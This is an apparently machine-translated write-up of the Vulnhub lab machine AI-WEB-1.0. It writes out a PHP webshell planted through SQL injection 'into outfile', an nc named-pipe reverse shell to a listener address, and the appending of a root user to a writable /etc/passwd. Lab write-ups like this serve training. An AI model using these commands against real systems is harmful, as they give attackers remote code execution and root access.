Preface

This article is just a record vulnhub The entry record on , Some methods used , Because the right to raise this is new , So the article may focus on this introduction more .

AI-WEB-1.0

The words here , Routine scanning first , I use masscan Sweeping （nmap Too slow ）.
You can go here first kali Take a look at your configuration .
Virtual network editor here , And then you can see

masscan 192.168.252.0/24 --top-ports 100 --rate 1000

Scanning here will find ip Duan Kai 80 port , And then visit 80 port
Will find 80 Port is such a thing , Japan , Conventional thinking , Put on the scanner （dirsearch）

python3 dirsearch.py -u xxxx

Here we find robots.txt, Go to robots.txt Medium visit . Found to have SQL Injection point . Yes SQL Injection points can be used select into oufile To write horses .（ Let's review into outfile Write horse ）

 Example :
select '<?php phpinfo();eval($_POST[1]);?>' into outfile ' Absolute path ';
into outfile Write horse requirements ：
（1） High authority account 
（2）secure_file_priv Need to be '';
（3） Know the absolute path of the website 

Here let me XOR for a long time , The absolute path of the website is generally /var/www/html such , But I can't connect , I saw my brother's wp Only to find out later , It was caused by my carelessness , They gave it to me robots.txt The directory above also needs to be scanned （…）
Cough cough cough , Scan and find , Yes info.php, Know the absolute path , Just try to use into outfile Write horse

Step on the pit 1：

I thought , It's easy to write to any directory , Japan , When there is a priv After not opening , I thought it was a log writing horse , I tried for a long time ........ To no avail , Plagiarize the bosses again wp Find out , My directory is wrong ..............
Cough cough cough , Back to the point , Connected to the shell.php And then I found out , It's a www-data jurisdiction
It completely requires a right raising operation . I'm confused here ,sudo It needs to enter a terminal to operate .

Step on the pit 2

rebound shell,（ It's true. I can't understand how the big guys construct ,bash Rebound doesn't bounce ,nc There is no response when connecting ） Everyone who understands , A wave of private messages .
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.252.134 6666 >/tmp/f
Here you can have a normal rebound shell, Find out /etc/passwd Read and write permission , Then refer to root Just write .

openssl -1 -salt echo echo

 You can write by referring to the following figure 
echo 'echo:1$hack$xR6zsfvpez/t8teGRRSNr.:0:0:root:/root:/bin/bash' >>/etc/passwd

python Go into interactive mode

python -c 'import pty;pty.spawn("/bin/bash")'

Upgrade to root jurisdiction

summary

（1） You can go /etc/passwd Fill in root Information , Then we will raise the right 
（2） It can be used openssl To preset the string 
（3） Use nc Strange gesture of command （ The rookie said he couldn't understand ）